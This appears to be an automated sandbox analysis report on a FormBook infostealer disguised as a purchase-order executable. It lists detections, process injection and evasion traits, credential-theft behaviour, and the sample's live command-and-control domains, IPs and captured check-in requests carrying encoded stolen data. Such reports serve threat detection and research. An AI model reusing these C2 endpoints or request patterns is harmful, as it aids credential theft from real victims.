Edit tour

Windows Analysis Report
PO_62401394_MITech_20250601.exe

Overview

General Information

Sample name:	PO_62401394_MITech_20250601.exe
Analysis ID:	1585196
MD5:	b01928cd0befa10c1c43b3339e03bd8d
SHA1:	4ad60b0dc750db8e158eeb6c020638f476c3298a
SHA256:	fb2a72faafc798d6d34f0a05f3603a36a66b684967e325051c8913ef0e118fa0
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file does not import any functions

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64native

PO_62401394_MITech_20250601.exe (PID: 4692 cmdline: "C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe" MD5: B01928CD0BEFA10C1C43B3339E03BD8D)

RAVCpl64.exe (PID: 7188 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)

fc.exe (PID: 6544 cmdline: "C:\Windows\SysWOW64\fc.exe" MD5: 4D5F86B337D0D099E18B14F1428AAEFF)

firefox.exe (PID: 6384 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.23285133806.00000000036A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.23283972486.00000000030A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.23285045111.0000000003650000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.22426186496.0000000000F20000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.PO_62401394_MITech_20250601.exe.c20000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:08:48.943382+0100	2050745	1	Malware Command and Control Activity Detected	192.168.11.20	49747	47.83.1.90	80	TCP
2025-01-07T10:09:12.886951+0100	2050745	1	Malware Command and Control Activity Detected	192.168.11.20	49751	84.32.84.32	80	TCP
2025-01-07T10:09:26.488958+0100	2050745	1	Malware Command and Control Activity Detected	192.168.11.20	49755	104.21.18.171	80	TCP
2025-01-07T10:09:41.563839+0100	2050745	1	Malware Command and Control Activity Detected	192.168.11.20	49759	134.122.135.48	80	TCP
2025-01-07T10:09:55.224178+0100	2050745	1	Malware Command and Control Activity Detected	192.168.11.20	49763	199.192.21.169	80	TCP
2025-01-07T10:10:10.374238+0100	2050745	1	Malware Command and Control Activity Detected	192.168.11.20	49767	154.197.162.239	80	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:08:48.943382+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49747	47.83.1.90	80	TCP
2025-01-07T10:09:12.886951+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49751	84.32.84.32	80	TCP
2025-01-07T10:09:26.488958+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49755	104.21.18.171	80	TCP
2025-01-07T10:09:41.563839+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49759	134.122.135.48	80	TCP
2025-01-07T10:09:55.224178+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49763	199.192.21.169	80	TCP
2025-01-07T10:10:10.374238+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49767	154.197.162.239	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:07:49.046303+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49750	84.32.84.32	80	TCP
2025-01-07T10:07:49.046303+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49749	84.32.84.32	80	TCP
2025-01-07T10:07:49.046303+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49748	84.32.84.32	80	TCP
2025-01-07T10:09:18.534153+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49752	104.21.18.171	80	TCP
2025-01-07T10:09:21.180712+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49753	104.21.18.171	80	TCP
2025-01-07T10:09:23.837045+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49754	104.21.18.171	80	TCP
2025-01-07T10:09:33.089585+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49756	134.122.135.48	80	TCP
2025-01-07T10:09:35.916665+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49757	134.122.135.48	80	TCP
2025-01-07T10:09:38.742411+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49758	134.122.135.48	80	TCP
2025-01-07T10:09:47.112045+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49760	199.192.21.169	80	TCP
2025-01-07T10:09:49.819982+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49761	199.192.21.169	80	TCP
2025-01-07T10:09:52.724831+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49762	199.192.21.169	80	TCP
2025-01-07T10:10:01.188487+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49764	154.197.162.239	80	TCP
2025-01-07T10:10:05.000797+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49765	154.197.162.239	80	TCP
2025-01-07T10:10:07.689430+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49766	154.197.162.239	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PO_62401394_MITech_20250601.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.gayhxi.info/k2i2/?KHKq=K3iyk&KI7UaA4=oYl0YuhK+EfenM8eRymXNBnaKArlDGdWSGf6Q1012MfAC24gU0JLDSHJdRiR078xrhufJIQsd6i55/X9+LeTdG3SQaFYv5Mzf8bAEkK4ob53ijBtuMlH5fk=

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: PO_62401394_MITech_20250601.exe	ReversingLabs: Detection: 68%
Source: PO_62401394_MITech_20250601.exe	Virustotal: Detection: 63%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 0.2.PO_62401394_MITech_20250601.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.23285133806.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.23283972486.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.23285045111.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.22426186496.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Machine Learning detection for sample

Source: PO_62401394_MITech_20250601.exe

Joe Sandbox ML: detected

Source: PO_62401394_MITech_20250601.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: PO_62401394_MITech_20250601.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: fc.pdb source: PO_62401394_MITech_20250601.exe, 00000000.00000003.22425274259.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: fc.pdbGCTL source: PO_62401394_MITech_20250601.exe, 00000000.00000003.22425274259.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: PO_62401394_MITech_20250601.exe, 00000000.00000003.22341940785.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, PO_62401394_MITech_20250601.exe, 00000000.00000003.22338550706.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, PO_62401394_MITech_20250601.exe, 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmp, PO_62401394_MITech_20250601.exe, 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000003.00000002.23285369881.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000003.00000002.23285369881.00000000039DD000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000003.00000003.22428795786.0000000003707000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000003.00000003.22425616266.0000000003552000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PO_62401394_MITech_20250601.exe, PO_62401394_MITech_20250601.exe, 00000000.00000003.22341940785.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, PO_62401394_MITech_20250601.exe, 00000000.00000003.22338550706.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, PO_62401394_MITech_20250601.exe, 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmp, PO_62401394_MITech_20250601.exe, 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000003.00000002.23285369881.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000003.00000002.23285369881.00000000039DD000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000003.00000003.22428795786.0000000003707000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000003.00000003.22425616266.0000000003552000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\fc.exe

Code function: 3_2_030BC870 FindFirstFileW,FindNextFileW,FindClose,

3_2_030BC870

Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 4x nop then mov ebx, 00000004h	0_2_00EB04CE
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 4x nop then mov ebx, 00000004h	2_2_033684CE
Source: C:\Windows\SysWOW64\fc.exe	Code function: 4x nop then xor eax, eax	3_2_030A9EC0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 4x nop then pop edi	3_2_030AE4C7
Source: C:\Windows\SysWOW64\fc.exe	Code function: 4x nop then mov ebx, 00000004h	3_2_037A04CE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49760 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49755 -> 104.21.18.171:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49747 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49747 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49751 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49764 -> 154.197.162.239:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49761 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49752 -> 104.21.18.171:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49759 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49762 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49754 -> 104.21.18.171:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49755 -> 104.21.18.171:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49751 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49759 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49757 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49753 -> 104.21.18.171:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49763 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49763 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49766 -> 154.197.162.239:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49756 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49758 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49765 -> 154.197.162.239:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49767 -> 154.197.162.239:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49767 -> 154.197.162.239:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49750 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49749 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49748 -> 84.32.84.32:80

Source: Joe Sandbox View

IP Address: 199.192.21.169 199.192.21.169

Source: Joe Sandbox View	ASN Name: COMING-ASABCDEGROUPCOMPANYLIMITEDHK COMING-ASABCDEGROUPCOMPANYLIMITEDHK
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Code function: 2_2_0336DB38 getaddrinfo,SleepEx,setsockopt,recv,recv,

2_2_0336DB38

Source: global traffic	HTTP traffic detected: GET /k2i2/?KHKq=K3iyk&KI7UaA4=oYl0YuhK+EfenM8eRymXNBnaKArlDGdWSGf6Q1012MfAC24gU0JLDSHJdRiR078xrhufJIQsd6i55/X9+LeTdG3SQaFYv5Mzf8bAEkK4ob53ijBtuMlH5fk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.gayhxi.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
Source: global traffic	HTTP traffic detected: GET /zaz4/?KI7UaA4=a/HH2smDyRg6YmpKuJ/CwFExB84HcD/ERV51bzugA0E0jiOKNXfjwDBbyDsX3ja9PlsooGpF4nQX9l9Mtzddkih80GA487ej2P9P6VRXNWvFWMG3SLWD8ho=&KHKq=K3iyk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.promocao.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
Source: global traffic	HTTP traffic detected: GET /kxtt/?KHKq=K3iyk&KI7UaA4=eC1oD4IhFSd/6jtM+gdYzJfxG74p9Bu5zKGW4KqWLMPitrzcqar0FZdKX10RVuOt75j4smH0EDZzb9gyazsXkw0DXdBvphotLgIy0LjdzSrSQl898rKd/4Q= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.grimbo.boatsConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
Source: global traffic	HTTP traffic detected: GET /a59t/?KI7UaA4=4xL6Q7DrxWj99jxey6rPnDV/q35G5BtjNwylhh0vBKzMCs+5V4gzFQEJFVb3bklsevH6tDeLKuQQ/YMUh7acruyVDzvneyJjblLgAmd8GM83k8VjUDwd43s=&KHKq=K3iyk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.44756.pizzaConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
Source: global traffic	HTTP traffic detected: GET /bowc/?KHKq=K3iyk&KI7UaA4=hSFyBF7QNpd6wUow9uow+ol61tLJyNEWjK6IJxkbiJgyDGKURjVOywh5a/1i9fugKQVYW71g1Iqe5QUBl7nO7+58J8zlUP0v8LIzRfWvKIRe9+cNHz16wuE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.lonfor.websiteConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
Source: global traffic	HTTP traffic detected: GET /cf9p/?KI7UaA4=tknvN2jlhTuvpXXYKbmDHxfvNfIutDmLNYYXG7/rIeGG9fe7kNXrAZ+6u3EcgYD6CfYKVegcRI1iRuMeH9uFP/TayYjwTZYlDf+E8idq81YEdMFJEoEtWTU=&KHKq=K3iyk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.investshares.netConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1

Source: fc.exe, 00000003.00000002.23287225942.0000000008324000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","pat

Source: global traffic	DNS traffic detected: DNS query: www.gayhxi.info
Source: global traffic	DNS traffic detected: DNS query: www.promocao.info
Source: global traffic	DNS traffic detected: DNS query: www.grimbo.boats
Source: global traffic	DNS traffic detected: DNS query: www.44756.pizza
Source: global traffic	DNS traffic detected: DNS query: www.lonfor.website
Source: global traffic	DNS traffic detected: DNS query: www.investshares.net

Source: unknown

HTTP traffic detected: POST /zaz4/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.promocao.infoOrigin: http://www.promocao.infoCache-Control: max-age=0Content-Length: 204Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.promocao.info/zaz4/User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1Data Raw: 4b 49 37 55 61 41 34 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 57 56 4c 74 5a 37 6c 74 33 63 57 66 4c 59 46 49 54 65 6c 44 6d 49 4e 59 51 44 4d 50 47 49 70 69 6b 71 30 47 56 72 77 37 78 31 67 31 67 4e 73 78 48 4b 56 59 57 4e 35 30 78 78 7a 31 33 63 66 2f 69 56 6a 69 44 31 75 74 42 6b 50 6b 6d 49 45 2b 71 53 43 34 64 51 30 76 54 73 32 4b 43 61 46 4a 75 6d 62 63 74 4c 62 31 47 55 4c 30 7a 64 45 33 73 44 6a 64 34 78 78 4a 2f 58 59 75 69 41 54 69 49 30 4a 62 78 78 57 64 5a 51 72 51 56 43 54 41 44 63 7a 75 66 69 39 31 6a 47 74 53 74 43 6d 58 36 6c 39 72 52 70 51 69 52 31 4b 4a 39 6c 42 51 48 56 63 7a 67 3d 3d Data Ascii: KI7UaA4=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczufi91jGtStCmX6l9rRpQiR1KJ9lBQHVczg==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 09:09:18 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gnNxFnVGoROaYqZtQjNrnydHV%2B0x7N6NrieUwSd0kfi7iZVK7qeABe4I1E0zml9K85ALboOASoXq4vDvRZgsnyXcXlwdX8AivOzcGlInRAfqkrYE7TRG%2BBhIdarQN0dZpMfR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fe2cee50ae7f604-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118786&min_rtt=118786&rtt_var=59393&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=736&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\
